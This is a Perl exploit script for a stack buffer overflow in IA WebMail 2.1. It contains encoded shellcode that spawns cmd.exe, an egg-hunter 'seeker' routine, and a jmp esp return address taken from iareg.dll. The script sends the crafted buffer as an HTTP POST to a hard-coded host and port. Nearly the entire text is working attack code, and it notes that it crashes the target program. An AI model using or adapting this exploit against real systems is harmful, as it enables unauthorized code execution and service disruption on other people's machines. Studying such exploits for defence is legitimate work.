#!/usr/bin/perl
#
# IA WebMail 2.1 exploit. Not very intrusive because it only launches a
# cmd.exe. Unfortunately, it does crash the program.
#
# The exploit below does the following:
#
# <stuff on stack>ABBA<nops><cmd.exe code><nops><eip><seeker code>    
#    ^               ^                                  | |
#    |seek___________|__________________________________| |
#                    |____________________________________|
#
#                         execute
#
# Pretty ineffecient but I think its cool ;-)
#
# The return address is a jmp esp from the iareg.dll object

use IO::Socket;

$seek_code =
        "\x31\xc0\x31\xdb\xb0\x12\xc1\xe0\x10\x66\xb8\x11\xf8\xbb\x41".
        "\x42\x42\x41\x40\x8b\x08\x39\xd9\x75\xf9\x43\x41\xff\xd0";


$shell =
        "\xeb\x11\x5e\x31\xc9\xb1\x1a\x80\x6c\x0e\xff\x1a\x80\xe9\x01".
        "\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\xa5\x06\x6f\xa5\x06\x82".
        "\x7f\x92\x7f\x3a\x82\x7d\x87\x7e\x48\xa7\x5f\x12\x6a\xd2\xd9".
        "\xa8\x1b\x92\x19\xea";



my $socket = new IO::Socket::INET (PeerAddr =3D> '10.0.50.228',
                                   PeerPort =3D> '8180',
                                   Proto    =3D> 'tcp');
die "Could not create socket: $!\n" unless $socket;

$buffer  = "A" x (300 - length($shell));
$buffer .= "ABBA";
$buffer .= $shell;
$buffer .= "A" x 736;

$buffer .= "\x33\xbd\x02\x10";
$buffer .= "$seek_code";

print $socket "POST /" . $buffer . " HTTP/1.0\n\n";
sleep(1);